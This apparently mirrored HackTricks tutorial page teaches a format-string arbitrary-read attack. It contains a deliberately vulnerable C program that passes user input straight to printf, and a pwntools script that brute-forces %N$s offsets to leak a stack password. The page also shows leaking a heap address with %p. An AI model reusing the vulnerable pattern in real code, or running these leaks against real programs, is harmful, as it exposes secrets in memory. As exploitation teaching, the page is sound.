mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
107 lines
4.3 KiB
Markdown
107 lines
4.3 KiB
Markdown
|
# Format Strings - Arbitrary Read Example
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
|
||
|
|
Other ways to support HackTricks:
|
||
|
|
|
||
|
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
|
||
|
|
</details>
|
||
|
|
|
||
|
|
## Code
|
||
|
|
|
||
|
|
```c
|
||
|
|
#include <stdio.h>
|
||
|
|
#include <string.h>
|
||
|
|
|
||
|
|
char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
|
||
|
|
|
||
|
|
int main() {
|
||
|
|
char stack_password[20] = "secretStackPass"; // Password in stack
|
||
|
|
char input1[20], input2[20];
|
||
|
|
|
||
|
|
printf("Enter first password: ");
|
||
|
|
scanf("%19s", input1);
|
||
|
|
|
||
|
|
printf("Enter second password: ");
|
||
|
|
scanf("%19s", input2);
|
||
|
|
|
||
|
|
// Vulnerable printf
|
||
|
|
printf(input1);
|
||
|
|
printf("\n");
|
||
|
|
|
||
|
|
// Check both passwords
|
||
|
|
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
|
||
|
|
printf("Access Granted.\n");
|
||
|
|
} else {
|
||
|
|
printf("Access Denied.\n");
|
||
|
|
}
|
||
|
|
|
||
|
|
return 0;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
Compile it with:
|
||
|
|
|
||
|
|
```bash
|
||
|
|
clang -o fs-read fs-read.c -Wno-format-security
|
||
|
|
```
|
||
|
|
|
||
|
|
### Read from stack
|
||
|
|
|
||
|
|
The **`stack_password`** will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack:
|
||
|
|
|
||
|
|
```python
|
||
|
|
from pwn import *
|
||
|
|
|
||
|
|
for i in range(100):
|
||
|
|
print(f"Try: {i}")
|
||
|
|
payload = f"%{i}$s\na".encode()
|
||
|
|
p = process("./fs-read")
|
||
|
|
p.sendline(payload)
|
||
|
|
output = p.clean()
|
||
|
|
print(output)
|
||
|
|
p.close()
|
||
|
|
```
|
||
|
|
|
||
|
|
In the image it's possible to see that we can leak the password from the stack in the `10th` position:
|
||
|
|
|
||
|
|
<figure><img src="../../.gitbook/assets/image (1231).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
|
||
|
|
<figure><img src="../../.gitbook/assets/image (1230).png" alt="" width="338"><figcaption></figcaption></figure>
|
||
|
|
|
||
|
|
Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%5$p`:
|
||
|
|
|
||
|
|
<figure><img src="../../.gitbook/assets/image (1232).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
|
||
|
|
<figure><img src="../../.gitbook/assets/image (1233).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
|
||
|
|
<figure><img src="../../.gitbook/assets/image (1234).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
|
||
|
|
The difference between the leaked address and the address of the password is:
|
||
|
|
|
||
|
|
```
|
||
|
|
> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
|
||
|
|
$1 = 0x126a
|
||
|
|
```
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
|
||
|
|
Other ways to support HackTricks:
|
||
|
|
|
||
|
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
|
||
|
|
</details>
|